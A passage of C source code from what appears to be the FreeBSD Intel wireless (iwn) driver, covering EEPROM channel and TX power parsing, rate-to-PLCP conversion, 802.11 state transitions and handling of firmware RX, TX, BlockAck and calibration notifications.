c->ic_flags = IEEE80211_CHAN_B | nflags; c = &ic->ic_channels[ic->ic_nchans++]; c[0] = c[-1]; c->ic_flags = IEEE80211_CHAN_G | nflags; } else { /* 5GHz band */ c->ic_freq = ieee80211_ieee2mhz(chan, IEEE80211_CHAN_A); c->ic_flags = IEEE80211_CHAN_A | nflags; } /* Save maximum allowed TX power for this channel. */ sc->maxpwr[chan] = channels[i].maxpwr; DPRINTF(sc, IWN_DEBUG_RESET, "add chan %d flags 0x%x maxpwr %d\n", chan, channels[i].flags, channels[i].maxpwr); if (sc->sc_flags & IWN_FLAG_HAS_11N) { /* add HT20, HT40 added separately */ c = &ic->ic_channels[ic->ic_nchans++]; c[0] = c[-1]; c->ic_flags |= IEEE80211_CHAN_HT20; } } DPRINTF(sc, IWN_DEBUG_TRACE, "->%s end\n", __func__); } static void iwn_read_eeprom_ht40(struct iwn_softc *sc, int n) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; struct iwn_eeprom_chan *channels = sc->eeprom_channels[n]; const struct iwn_chan_band *band = &iwn_bands[n]; struct ieee80211_channel *c, *cent, *extc; uint8_t chan; int i, nflags; DPRINTF(sc, IWN_DEBUG_TRACE, "->%s start\n", __func__); if (!(sc->sc_flags & IWN_FLAG_HAS_11N)) { DPRINTF(sc, IWN_DEBUG_TRACE, "->%s end no 11n\n", __func__); return; } for (i = 0; i < band->nchan; i++) { if (!(channels[i].flags & IWN_EEPROM_CHAN_VALID)) { DPRINTF(sc, IWN_DEBUG_RESET, "skip chan %d flags 0x%x maxpwr %d\n", band->chan[i], channels[i].flags, channels[i].maxpwr); continue; } chan = band->chan[i]; nflags = iwn_eeprom_channel_flags(&channels[i]); /* * Each entry defines an HT40 channel pair; find the * center channel, then the extension channel above. */ cent = ieee80211_find_channel_byieee(ic, chan, (n == 5 ? IEEE80211_CHAN_G : IEEE80211_CHAN_A)); if (cent == NULL) { /* XXX shouldn't happen */ device_printf(sc->sc_dev, "%s: no entry for channel %d\n", __func__, chan); continue; } extc = ieee80211_find_channel(ic, cent->ic_freq+20, (n == 5 ? 
IEEE80211_CHAN_G : IEEE80211_CHAN_A)); if (extc == NULL) { DPRINTF(sc, IWN_DEBUG_RESET, "%s: skip chan %d, extension channel not found\n", __func__, chan); continue; } DPRINTF(sc, IWN_DEBUG_RESET, "add ht40 chan %d flags 0x%x maxpwr %d\n", chan, channels[i].flags, channels[i].maxpwr); c = &ic->ic_channels[ic->ic_nchans++]; c[0] = cent[0]; c->ic_extieee = extc->ic_ieee; c->ic_flags &= ~IEEE80211_CHAN_HT; c->ic_flags |= IEEE80211_CHAN_HT40U | nflags; c = &ic->ic_channels[ic->ic_nchans++]; c[0] = extc[0]; c->ic_extieee = cent->ic_ieee; c->ic_flags &= ~IEEE80211_CHAN_HT; c->ic_flags |= IEEE80211_CHAN_HT40D | nflags; } DPRINTF(sc, IWN_DEBUG_TRACE, "->%s end\n", __func__); } static void iwn_read_eeprom_channels(struct iwn_softc *sc, int n, uint32_t addr) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; iwn_read_prom_data(sc, addr, &sc->eeprom_channels[n], iwn_bands[n].nchan * sizeof (struct iwn_eeprom_chan)); if (n < 5) iwn_read_eeprom_band(sc, n); else iwn_read_eeprom_ht40(sc, n); ieee80211_sort_channels(ic->ic_channels, ic->ic_nchans); } static struct iwn_eeprom_chan * iwn_find_eeprom_channel(struct iwn_softc *sc, struct ieee80211_channel *c) { int band, chan, i, j; if (IEEE80211_IS_CHAN_HT40(c)) { band = IEEE80211_IS_CHAN_5GHZ(c) ? 6 : 5; if (IEEE80211_IS_CHAN_HT40D(c)) chan = c->ic_extieee; else chan = c->ic_ieee; for (i = 0; i < iwn_bands[band].nchan; i++) { if (iwn_bands[band].chan[i] == chan) return &sc->eeprom_channels[band][i]; } } else { for (j = 0; j < 5; j++) { for (i = 0; i < iwn_bands[j].nchan; i++) { if (iwn_bands[j].chan[i] == c->ic_ieee) return &sc->eeprom_channels[j][i]; } } } return NULL; } /* * Enforce flags read from EEPROM. */ static int iwn_setregdomain(struct ieee80211com *ic, struct ieee80211_regdomain *rd, int nchan, struct ieee80211_channel chans[]) { struct iwn_softc *sc = ic->ic_ifp->if_softc; int i; for (i = 0; i < nchan; i++) { struct ieee80211_channel *c = &chans[i]; struct iwn_eeprom_chan *channel; channel = iwn_find_eeprom_channel(sc, c); if (channel == NULL) { if_printf(ic->ic_ifp, "%s: invalid channel %u freq %u/0x%x\n", __func__, c->ic_ieee, c->ic_freq, c->ic_flags); return EINVAL; } c->ic_flags |= iwn_eeprom_channel_flags(channel); } return 0; } static void iwn_read_eeprom_enhinfo(struct iwn_softc *sc) { struct iwn_eeprom_enhinfo enhinfo[35]; struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; struct ieee80211_channel *c; uint16_t val, base; int8_t maxpwr; uint8_t flags; int i, j; DPRINTF(sc, IWN_DEBUG_TRACE, "->%s begin\n", __func__); iwn_read_prom_data(sc, IWN5000_EEPROM_REG, &val, 2); base = le16toh(val); iwn_read_prom_data(sc, base + IWN6000_EEPROM_ENHINFO, enhinfo, sizeof enhinfo); for (i = 0; i < nitems(enhinfo); i++) { flags = enhinfo[i].flags; if (!(flags & IWN_ENHINFO_VALID)) continue; /* Skip invalid entries. 
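 * A valid entry carries per-chain and per-MIMO TX power limits which,
 * judging by the maxpwr / 2 conversion below, appear to be stored in
 * half-dBm units.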
*/ maxpwr = 0; if (sc->txchainmask & IWN_ANT_A) maxpwr = MAX(maxpwr, enhinfo[i].chain[0]); if (sc->txchainmask & IWN_ANT_B) maxpwr = MAX(maxpwr, enhinfo[i].chain[1]); if (sc->txchainmask & IWN_ANT_C) maxpwr = MAX(maxpwr, enhinfo[i].chain[2]); if (sc->ntxchains == 2) maxpwr = MAX(maxpwr, enhinfo[i].mimo2); else if (sc->ntxchains == 3) maxpwr = MAX(maxpwr, enhinfo[i].mimo3); for (j = 0; j < ic->ic_nchans; j++) { c = &ic->ic_channels[j]; if ((flags & IWN_ENHINFO_5GHZ)) { if (!IEEE80211_IS_CHAN_A(c)) continue; } else if ((flags & IWN_ENHINFO_OFDM)) { if (!IEEE80211_IS_CHAN_G(c)) continue; } else if (!IEEE80211_IS_CHAN_B(c)) continue; if ((flags & IWN_ENHINFO_HT40)) { if (!IEEE80211_IS_CHAN_HT40(c)) continue; } else { if (IEEE80211_IS_CHAN_HT40(c)) continue; } if (enhinfo[i].chan != 0 && enhinfo[i].chan != c->ic_ieee) continue; DPRINTF(sc, IWN_DEBUG_RESET, "channel %d(%x), maxpwr %d\n", c->ic_ieee, c->ic_flags, maxpwr / 2); c->ic_maxregpower = maxpwr / 2; c->ic_maxpower = maxpwr; } } DPRINTF(sc, IWN_DEBUG_TRACE, "->%s end\n", __func__); } static struct ieee80211_node * iwn_node_alloc(struct ieee80211vap *vap, const uint8_t mac[IEEE80211_ADDR_LEN]) { return malloc(sizeof (struct iwn_node), M_80211_NODE,M_NOWAIT | M_ZERO); } static __inline int rate2plcp(int rate) { switch (rate & 0xff) { case 12: return 0xd; case 18: return 0xf; case 24: return 0x5; case 36: return 0x7; case 48: return 0x9; case 72: return 0xb; case 96: return 0x1; case 108: return 0x3; case 2: return 10; case 4: return 20; case 11: return 55; case 22: return 110; } return 0; } /* * Calculate the required PLCP value from the given rate, * to the given node. * * This will take the node configuration (eg 11n, rate table * setup, etc) into consideration. */ static uint32_t iwn_rate_to_plcp(struct iwn_softc *sc, struct ieee80211_node *ni, uint8_t rate) { #define RV(v) ((v) & IEEE80211_RATE_VAL) struct ieee80211com *ic = ni->ni_ic; uint8_t txant1, txant2; uint32_t plcp = 0; int ridx; /* Use the first valid TX antenna. */ txant1 = IWN_LSB(sc->txchainmask); txant2 = IWN_LSB(sc->txchainmask & ~txant1); /* * If it's an MCS rate, let's set the plcp correctly * and set the relevant flags based on the node config. */ if (rate & IEEE80211_RATE_MCS) { /* * Set the initial PLCP value to be between 0->31 for * MCS 0 -> MCS 31, then set the "I'm an MCS rate!" * flag. */ plcp = RV(rate) | IWN_RFLAG_MCS; /* * XXX the following should only occur if both * the local configuration _and_ the remote node * advertise these capabilities. Thus this code * may need fixing! */ /* * Set the channel width and guard interval. */ if (IEEE80211_IS_CHAN_HT40(ni->ni_chan)) { plcp |= IWN_RFLAG_HT40; if (ni->ni_htcap & IEEE80211_HTCAP_SHORTGI40) plcp |= IWN_RFLAG_SGI; } else if (ni->ni_htcap & IEEE80211_HTCAP_SHORTGI20) { plcp |= IWN_RFLAG_SGI; } /* * If it's a two stream rate, enable TX on both * antennas. * * XXX three stream rates? */ if (rate > 0x87) plcp |= IWN_RFLAG_ANT(txant1 | txant2); else plcp |= IWN_RFLAG_ANT(txant1); } else { /* * Set the initial PLCP - fine for both * OFDM and CCK rates. */ plcp = rate2plcp(rate); /* Set CCK flag if it's CCK */ /* XXX It would be nice to have a method * to map the ridx -> phy table entry * so we could just query that, rather than * this hack to check against IWN_RIDX_OFDM6. 
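 *
 * For reference, the legacy mapping performed by rate2plcp() above is:
 *   CCK : 1/2/5.5/11 Mb/s       -> PLCP 10/20/55/110 (needs IWN_RFLAG_CCK)
 *   OFDM: 6/9/12/18/24/36/48/54 -> PLCP 0xd/0xf/0x5/0x7/0x9/0xb/0x1/0x3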
*/ ridx = ieee80211_legacy_rate_lookup(ic->ic_rt, rate & IEEE80211_RATE_VAL); if (ridx < IWN_RIDX_OFDM6 && IEEE80211_IS_CHAN_2GHZ(ni->ni_chan)) plcp |= IWN_RFLAG_CCK; /* Set antenna configuration */ plcp |= IWN_RFLAG_ANT(txant1); } DPRINTF(sc, IWN_DEBUG_TXRATE, "%s: rate=0x%02x, plcp=0x%08x\n", __func__, rate, plcp); return (htole32(plcp)); #undef RV } static void iwn_newassoc(struct ieee80211_node *ni, int isnew) { /* Doesn't do anything at the moment */ } static int iwn_media_change(struct ifnet *ifp) { int error; error = ieee80211_media_change(ifp); /* NB: only the fixed rate can change and that doesn't need a reset */ return (error == ENETRESET ? 0 : error); } static int iwn_newstate(struct ieee80211vap *vap, enum ieee80211_state nstate, int arg) { struct iwn_vap *ivp = IWN_VAP(vap); struct ieee80211com *ic = vap->iv_ic; struct iwn_softc *sc = ic->ic_ifp->if_softc; int error = 0; DPRINTF(sc, IWN_DEBUG_TRACE, "->%s begin\n", __func__); DPRINTF(sc, IWN_DEBUG_STATE, "%s: %s -> %s\n", __func__, ieee80211_state_name[vap->iv_state], ieee80211_state_name[nstate]); IEEE80211_UNLOCK(ic); IWN_LOCK(sc); callout_stop(&sc->calib_to); sc->rxon = &sc->rx_on[IWN_RXON_BSS_CTX]; switch (nstate) { case IEEE80211_S_ASSOC: if (vap->iv_state != IEEE80211_S_RUN) break; /* FALLTHROUGH */ case IEEE80211_S_AUTH: if (vap->iv_state == IEEE80211_S_AUTH) break; /* * !AUTH -> AUTH transition requires state reset to handle * reassociations correctly. */ sc->rxon->associd = 0; sc->rxon->filter &= ~htole32(IWN_FILTER_BSS); sc->calib.state = IWN_CALIB_STATE_INIT; if ((error = iwn_auth(sc, vap)) != 0) { device_printf(sc->sc_dev, "%s: could not move to auth state\n", __func__); } break; case IEEE80211_S_RUN: /* * RUN -> RUN transition; Just restart the timers. */ if (vap->iv_state == IEEE80211_S_RUN) { sc->calib_cnt = 0; break; } /* * !RUN -> RUN requires setting the association id * which is done with a firmware cmd. We also defer * starting the timers until that work is done. */ if ((error = iwn_run(sc, vap)) != 0) { device_printf(sc->sc_dev, "%s: could not move to run state\n", __func__); } break; case IEEE80211_S_INIT: sc->calib.state = IWN_CALIB_STATE_INIT; break; default: break; } IWN_UNLOCK(sc); IEEE80211_LOCK(ic); if (error != 0){ DPRINTF(sc, IWN_DEBUG_TRACE, "->%s end in error\n", __func__); return error; } DPRINTF(sc, IWN_DEBUG_TRACE, "->%s: end\n",__func__); return ivp->iv_newstate(vap, nstate, arg); } static void iwn_calib_timeout(void *arg) { struct iwn_softc *sc = arg; IWN_LOCK_ASSERT(sc); /* Force automatic TX power calibration every 60 secs. */ if (++sc->calib_cnt >= 120) { uint32_t flags = 0; DPRINTF(sc, IWN_DEBUG_CALIBRATE, "%s\n", "sending request for statistics"); (void)iwn_cmd(sc, IWN_CMD_GET_STATISTICS, &flags, sizeof flags, 1); sc->calib_cnt = 0; } callout_reset(&sc->calib_to, msecs_to_ticks(500), iwn_calib_timeout, sc); } /* * Process an RX_PHY firmware notification. This is usually immediately * followed by an MPDU_RX_DONE notification. */ static void iwn_rx_phy(struct iwn_softc *sc, struct iwn_rx_desc *desc, struct iwn_rx_data *data) { struct iwn_rx_stat *stat = (struct iwn_rx_stat *)(desc + 1); DPRINTF(sc, IWN_DEBUG_CALIBRATE, "%s: received PHY stats\n", __func__); bus_dmamap_sync(sc->rxq.data_dmat, data->map, BUS_DMASYNC_POSTREAD); /* Save RX statistics, they will be used on MPDU_RX_DONE. */ memcpy(&sc->last_rx_stat, stat, sizeof (*stat)); sc->last_rx_valid = 1; } /* * Process an RX_DONE (4965AGN only) or MPDU_RX_DONE firmware notification. 
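 * The received frame is swapped off the RX ring in exchange for a newly
 * allocated jumbo mbuf before being handed up to net80211.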
* Each MPDU_RX_DONE notification must be preceded by an RX_PHY one. */ static void iwn_rx_done(struct iwn_softc *sc, struct iwn_rx_desc *desc, struct iwn_rx_data *data) { struct iwn_ops *ops = &sc->ops; struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; struct iwn_rx_ring *ring = &sc->rxq; struct ieee80211_frame *wh; struct ieee80211_node *ni; struct mbuf *m, *m1; struct iwn_rx_stat *stat; caddr_t head; bus_addr_t paddr; uint32_t flags; int error, len, rssi, nf; DPRINTF(sc, IWN_DEBUG_TRACE, "->%s begin\n", __func__); if (desc->type == IWN_MPDU_RX_DONE) { /* Check for prior RX_PHY notification. */ if (!sc->last_rx_valid) { DPRINTF(sc, IWN_DEBUG_ANY, "%s: missing RX_PHY\n", __func__); return; } stat = &sc->last_rx_stat; } else stat = (struct iwn_rx_stat *)(desc + 1); bus_dmamap_sync(ring->data_dmat, data->map, BUS_DMASYNC_POSTREAD); if (stat->cfg_phy_len > IWN_STAT_MAXLEN) { device_printf(sc->sc_dev, "%s: invalid RX statistic header, len %d\n", __func__, stat->cfg_phy_len); return; } if (desc->type == IWN_MPDU_RX_DONE) { struct iwn_rx_mpdu *mpdu = (struct iwn_rx_mpdu *)(desc + 1); head = (caddr_t)(mpdu + 1); len = le16toh(mpdu->len); } else { head = (caddr_t)(stat + 1) + stat->cfg_phy_len; len = le16toh(stat->len); } flags = le32toh(*(uint32_t *)(head + len)); /* Discard frames with a bad FCS early. */ if ((flags & IWN_RX_NOERROR) != IWN_RX_NOERROR) { DPRINTF(sc, IWN_DEBUG_RECV, "%s: RX flags error %x\n", __func__, flags); ifp->if_ierrors++; return; } /* Discard frames that are too short. */ if (len < sizeof (*wh)) { DPRINTF(sc, IWN_DEBUG_RECV, "%s: frame too short: %d\n", __func__, len); ifp->if_ierrors++; return; } m1 = m_getjcl(M_NOWAIT, MT_DATA, M_PKTHDR, IWN_RBUF_SIZE); if (m1 == NULL) { DPRINTF(sc, IWN_DEBUG_ANY, "%s: no mbuf to restock ring\n", __func__); ifp->if_ierrors++; return; } bus_dmamap_unload(ring->data_dmat, data->map); error = bus_dmamap_load(ring->data_dmat, data->map, mtod(m1, void *), IWN_RBUF_SIZE, iwn_dma_map_addr, &paddr, BUS_DMA_NOWAIT); if (error != 0 && error != EFBIG) { device_printf(sc->sc_dev, "%s: bus_dmamap_load failed, error %d\n", __func__, error); m_freem(m1); /* Try to reload the old mbuf. */ error = bus_dmamap_load(ring->data_dmat, data->map, mtod(data->m, void *), IWN_RBUF_SIZE, iwn_dma_map_addr, &paddr, BUS_DMA_NOWAIT); if (error != 0 && error != EFBIG) { panic("%s: could not load old RX mbuf", __func__); } /* Physical address may have changed. */ ring->desc[ring->cur] = htole32(paddr >> 8); bus_dmamap_sync(ring->data_dmat, ring->desc_dma.map, BUS_DMASYNC_PREWRITE); ifp->if_ierrors++; return; } m = data->m; data->m = m1; /* Update RX descriptor. */ ring->desc[ring->cur] = htole32(paddr >> 8); bus_dmamap_sync(ring->desc_dma.tag, ring->desc_dma.map, BUS_DMASYNC_PREWRITE); /* Finalize mbuf. */ m->m_pkthdr.rcvif = ifp; m->m_data = head; m->m_pkthdr.len = m->m_len = len; /* Grab a reference to the source node. */ wh = mtod(m, struct ieee80211_frame *); ni = ieee80211_find_rxnode(ic, (struct ieee80211_frame_min *)wh); nf = (ni != NULL && ni->ni_vap->iv_state == IEEE80211_S_RUN && (ic->ic_flags & IEEE80211_F_SCAN) == 0) ? sc->noise : -95; rssi = ops->get_rssi(sc, stat); if (ieee80211_radiotap_active(ic)) { struct iwn_rx_radiotap_header *tap = &sc->sc_rxtap; tap->wr_flags = 0; if (stat->flags & htole16(IWN_STAT_FLAG_SHPREAMBLE)) tap->wr_flags |= IEEE80211_RADIOTAP_F_SHORTPRE; tap->wr_dbm_antsignal = (int8_t)rssi; tap->wr_dbm_antnoise = (int8_t)nf; tap->wr_tsft = stat->tstamp; switch (stat->rate) { /* CCK rates. 
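 * 10, 20, 55 and 110 are the CCK codes for 1, 2, 5.5 and 11 Mb/s;
 * the OFDM codes below mirror the rate2plcp() mapping.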
*/ case 10: tap->wr_rate = 2; break; case 20: tap->wr_rate = 4; break; case 55: tap->wr_rate = 11; break; case 110: tap->wr_rate = 22; break; /* OFDM rates. */ case 0xd: tap->wr_rate = 12; break; case 0xf: tap->wr_rate = 18; break; case 0x5: tap->wr_rate = 24; break; case 0x7: tap->wr_rate = 36; break; case 0x9: tap->wr_rate = 48; break; case 0xb: tap->wr_rate = 72; break; case 0x1: tap->wr_rate = 96; break; case 0x3: tap->wr_rate = 108; break; /* Unknown rate: should not happen. */ default: tap->wr_rate = 0; } } IWN_UNLOCK(sc); /* Send the frame to the 802.11 layer. */ if (ni != NULL) { if (ni->ni_flags & IEEE80211_NODE_HT) m->m_flags |= M_AMPDU; (void)ieee80211_input(ni, m, rssi - nf, nf); /* Node is no longer needed. */ ieee80211_free_node(ni); } else (void)ieee80211_input_all(ic, m, rssi - nf, nf); IWN_LOCK(sc); DPRINTF(sc, IWN_DEBUG_TRACE, "->%s: end\n",__func__); } /* Process an incoming Compressed BlockAck. */ static void iwn_rx_compressed_ba(struct iwn_softc *sc, struct iwn_rx_desc *desc, struct iwn_rx_data *data) { struct iwn_ops *ops = &sc->ops; struct ifnet *ifp = sc->sc_ifp; struct iwn_node *wn; struct ieee80211_node *ni; struct iwn_compressed_ba *ba = (struct iwn_compressed_ba *)(desc + 1); struct iwn_tx_ring *txq; struct iwn_tx_data *txdata; struct ieee80211_tx_ampdu *tap; struct mbuf *m; uint64_t bitmap; uint16_t ssn; uint8_t tid; int ackfailcnt = 0, i, lastidx, qid, *res, shift; DPRINTF(sc, IWN_DEBUG_TRACE, "->%s begin\n", __func__); bus_dmamap_sync(sc->rxq.data_dmat, data->map, BUS_DMASYNC_POSTREAD); qid = le16toh(ba->qid); txq = &sc->txq[ba->qid]; tap = sc->qid2tap[ba->qid]; tid = tap->txa_tid; wn = (void *)tap->txa_ni; res = NULL; ssn = 0; if (!IEEE80211_AMPDU_RUNNING(tap)) { res = tap->txa_private; ssn = tap->txa_start & 0xfff; } for (lastidx = le16toh(ba->ssn) & 0xff; txq->read != lastidx;) { txdata = &txq->data[txq->read]; /* Unmap and free mbuf. */ bus_dmamap_sync(txq->data_dmat, txdata->map, BUS_DMASYNC_POSTWRITE); bus_dmamap_unload(txq->data_dmat, txdata->map); m = txdata->m, txdata->m = NULL; ni = txdata->ni, txdata->ni = NULL; KASSERT(ni != NULL, ("no node")); KASSERT(m != NULL, ("no mbuf")); ieee80211_tx_complete(ni, m, 1); txq->queued--; txq->read = (txq->read + 1) % IWN_TX_RING_COUNT; } if (txq->queued == 0 && res != NULL) { iwn_nic_lock(sc); ops->ampdu_tx_stop(sc, qid, tid, ssn); iwn_nic_unlock(sc); sc->qid2tap[qid] = NULL; free(res, M_DEVBUF); return; } if (wn->agg[tid].bitmap == 0) return; shift = wn->agg[tid].startidx - ((le16toh(ba->seq) >> 4) & 0xff); if (shift < 0) shift += 0x100; if (wn->agg[tid].nframes > (64 - shift)) return; ni = tap->txa_ni; bitmap = (le64toh(ba->bitmap) >> shift) & wn->agg[tid].bitmap; for (i = 0; bitmap; i++) { if ((bitmap & 1) == 0) { ifp->if_oerrors++; ieee80211_ratectl_tx_complete(ni->ni_vap, ni, IEEE80211_RATECTL_TX_FAILURE, &ackfailcnt, NULL); } else { ifp->if_opackets++; ieee80211_ratectl_tx_complete(ni->ni_vap, ni, IEEE80211_RATECTL_TX_SUCCESS, &ackfailcnt, NULL); } bitmap >>= 1; } DPRINTF(sc, IWN_DEBUG_TRACE, "->%s: end\n",__func__); } /* * Process a CALIBRATION_RESULT notification sent by the initialization * firmware on response to a CMD_CALIB_CONFIG command (5000 only). */ static void iwn5000_rx_calib_results(struct iwn_softc *sc, struct iwn_rx_desc *desc, struct iwn_rx_data *data) { struct iwn_phy_calib *calib = (struct iwn_phy_calib *)(desc + 1); int len, idx = -1; DPRINTF(sc, IWN_DEBUG_TRACE, "->%s begin\n", __func__); /* Runtime firmware should not send such a notification. 
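 * (The results are stashed in sc->calibcmd[] below, presumably so they
 * can be replayed to the runtime firmware once it has been loaded.)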
*/ if (sc->sc_flags & IWN_FLAG_CALIB_DONE){ DPRINTF(sc, IWN_DEBUG_TRACE, "->%s received after clib done\n", __func__); return; } len = (le32toh(desc->len) & 0x3fff) - 4; bus_dmamap_sync(sc->rxq.data_dmat, data->map, BUS_DMASYNC_POSTREAD); switch (calib->code) { case IWN5000_PHY_CALIB_DC: if (sc->base_params->calib_need & IWN_FLG_NEED_PHY_CALIB_DC) idx = 0; break; case IWN5000_PHY_CALIB_LO: if (sc->base_params->calib_need & IWN_FLG_NEED_PHY_CALIB_LO) idx = 1; break; case IWN5000_PHY_CALIB_TX_IQ: if (sc->base_params->calib_need & IWN_FLG_NEED_PHY_CALIB_TX_IQ) idx = 2; break; case IWN5000_PHY_CALIB_TX_IQ_PERIODIC: if (sc->base_params->calib_need & IWN_FLG_NEED_PHY_CALIB_TX_IQ_PERIODIC) idx = 3; break; case IWN5000_PHY_CALIB_BASE_BAND: if (sc->base_params->calib_need & IWN_FLG_NEED_PHY_CALIB_BASE_BAND) idx = 4; break; } if (idx == -1) /* Ignore other results. */ return; /* Save calibration result. */ if (sc->calibcmd[idx].buf != NULL) free(sc->calibcmd[idx].buf, M_DEVBUF); sc->calibcmd[idx].buf = malloc(len, M_DEVBUF, M_NOWAIT); if (sc->calibcmd[idx].buf == NULL) { DPRINTF(sc, IWN_DEBUG_CALIBRATE, "not enough memory for calibration result %d\n", calib->code); return; } DPRINTF(sc, IWN_DEBUG_CALIBRATE, "saving calibration result idx=%d, code=%d len=%d\n", idx, calib->code, len); sc->calibcmd[idx].len = len; memcpy(sc->calibcmd[idx].buf, calib, len); } /* * Process an RX_STATISTICS or BEACON_STATISTICS firmware notification. * The latter is sent by the firmware after each received beacon. */ static void iwn_rx_statistics(struct iwn_softc *sc, struct iwn_rx_desc *desc, struct iwn_rx_data *data) { struct iwn_ops *ops = &sc->ops; struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; struct ieee80211vap *vap = TAILQ_FIRST(&ic->ic_vaps); struct iwn_calib_state *calib = &sc->calib; struct iwn_stats *stats = (struct iwn_stats *)(desc + 1); int temp; DPRINTF(sc, IWN_DEBUG_TRACE, "->%s begin\n", __func__); /* Ignore statistics received during a scan. */ if (vap->iv_state != IEEE80211_S_RUN || (ic->ic_flags & IEEE80211_F_SCAN)){ DPRINTF(sc, IWN_DEBUG_TRACE, "->%s received during calib\n", __func__); return; } bus_dmamap_sync(sc->rxq.data_dmat, data->map, BUS_DMASYNC_POSTREAD); DPRINTF(sc, IWN_DEBUG_CALIBRATE, "%s: received statistics, cmd %d\n", __func__, desc->type); sc->calib_cnt = 0; /* Reset TX power calibration timeout. */ /* Test if temperature has changed. */ if (stats->general.temp != sc->rawtemp) { /* Convert "raw" temperature to degC. */ sc->rawtemp = stats->general.temp; temp = ops->get_temperature(sc); DPRINTF(sc, IWN_DEBUG_CALIBRATE, "%s: temperature %d\n", __func__, temp); /* Update TX power if need be (4965AGN only). */ if (sc->hw_type == IWN_HW_REV_TYPE_4965) iwn4965_power_calibration(sc, temp); } if (desc->type != IWN_BEACON_STATISTICS) return; /* Reply to a statistics request. */ sc->noise = iwn_get_noise(&stats->rx.general); DPRINTF(sc, IWN_DEBUG_CALIBRATE, "%s: noise %d\n", __func__, sc->noise); /* Test that RSSI and noise are present in stats report. */ if (le32toh(stats->rx.general.flags) != 1) { DPRINTF(sc, IWN_DEBUG_ANY, "%s\n", "received statistics without RSSI"); return; } if (calib->state == IWN_CALIB_STATE_ASSOC) iwn_collect_noise(sc, &stats->rx.general); else if (calib->state == IWN_CALIB_STATE_RUN) { iwn_tune_sensitivity(sc, &stats->rx); /* * XXX TODO: Only run the RX recovery if we're associated! 
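 * The false-alarm and bad-PLCP counters saved below become the baseline
 * for the next sensitivity calibration pass.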
*/ iwn_check_rx_recovery(sc, stats); iwn_save_stats_counters(sc, stats); } DPRINTF(sc, IWN_DEBUG_TRACE, "->%s: end\n",__func__); } /* * Save the relevant statistic counters for the next calibration * pass. */ static void iwn_save_stats_counters(struct iwn_softc *sc, const struct iwn_stats *rs) { struct iwn_calib_state *calib = &sc->calib; /* Save counters values for next call. */ calib->bad_plcp_cck = le32toh(rs->rx.cck.bad_plcp); calib->fa_cck = le32toh(rs->rx.cck.fa); calib->bad_plcp_ht = le32toh(rs->rx.ht.bad_plcp); calib->bad_plcp_ofdm = le32toh(rs->rx.ofdm.bad_plcp); calib->fa_ofdm = le32toh(rs->rx.ofdm.fa); /* Last time we received these tick values */ sc->last_calib_ticks = ticks; } /* * Process a TX_DONE firmware notification. Unfortunately, the 4965AGN * and 5000 adapters have different incompatible TX status formats. */ static void iwn4965_tx_done(struct iwn_softc *sc, struct iwn_rx_desc *desc, struct iwn_rx_data *data) { struct iwn4965_tx_stat *stat = (struct iwn4965_tx_stat *)(desc + 1); struct iwn_tx_ring *ring; int qid; qid = desc->qid & 0xf; ring = &sc->txq[qid]; DPRINTF(sc, IWN_DEBUG_XMIT, "%s: " "qid %d idx %d retries %d nkill %d rate %x duration %d status %x\n", __func__, desc->qid, desc->idx, stat->ackfailcnt, stat->btkillcnt, stat->rate, le16toh(stat->duration), le32toh(stat->status)); bus_dmamap_sync(ring->data_dmat, data->map, BUS_DMASYNC_POSTREAD); if (qid >= sc->firstaggqueue) { iwn_ampdu_tx_done(sc, qid, desc->idx, stat->nframes, &stat->status); } else { iwn_tx_done(sc, desc, stat->ackfailcnt, le32toh(stat->status) & 0xff); } } static void iwn5000_tx_done(struct iwn_softc *sc, struct iwn_rx_desc *desc, struct iwn_rx_data *data) { struct iwn5000_tx_stat *stat = (struct iwn5000_tx_stat *)(desc + 1); struct iwn_tx_ring *ring; int qid; qid = desc->qid & 0xf; ring = &sc->txq[qid]; DPRINTF(sc, IWN_DEBUG_XMIT, "%s: " "qid %d idx %d retries %d nkill %d rate %x duration %d status %x\n", __func__, desc->qid, desc->idx, stat->ackfailcnt, stat->btkillcnt, stat->rate, le16toh(stat->duration), le32toh(stat->status)); #ifdef notyet /* Reset TX scheduler slot. */ iwn5000_reset_sched(sc, desc->qid & 0xf, desc->idx); #endif bus_dmamap_sync(ring->data_dmat, data->map, BUS_DMASYNC_POSTREAD); if (qid >= sc->firstaggqueue) { iwn_ampdu_tx_done(sc, qid, desc->idx, stat->nframes, &stat->status); } else { iwn_tx_done(sc, desc, stat->ackfailcnt, le16toh(stat->status) & 0xff); } } /* * Adapter-independent backend for TX_DONE firmware notifications. */ static void iwn_tx_done(struct iwn_softc *sc, struct iwn_rx_desc *desc, int ackfailcnt, uint8_t status) { struct ifnet *ifp = sc->sc_ifp; struct iwn_tx_ring *ring = &sc->txq[desc->qid & 0xf]; struct iwn_tx_data *data = &ring->data[desc->idx]; struct mbuf *m; struct ieee80211_node *ni; struct ieee80211vap *vap; KASSERT(data->ni != NULL, ("no node")); DPRINTF(sc, IWN_DEBUG_TRACE, "->%s begin\n", __func__); /* Unmap and free mbuf. */ bus_dmamap_sync(ring->data_dmat, data->map, BUS_DMASYNC_POSTWRITE); bus_dmamap_unload(ring->data_dmat, data->map); m = data->m, data->m = NULL; ni = data->ni, data->ni = NULL; vap = ni->ni_vap; /* * Update rate control statistics for the node. */ if (status & IWN_TX_FAIL) { ifp->if_oerrors++; ieee80211_ratectl_tx_complete(vap, ni, IEEE80211_RATECTL_TX_FAILURE, &ackfailcnt, NULL); } else { ifp->if_opackets++; ieee80211_ratectl_tx_complete(vap, ni, IEEE80211_RATECTL_TX_SUCCESS, &ackfailcnt, NULL); } /* * Channels marked for "radar" require traffic to be received * to unlock before we can transmit. 
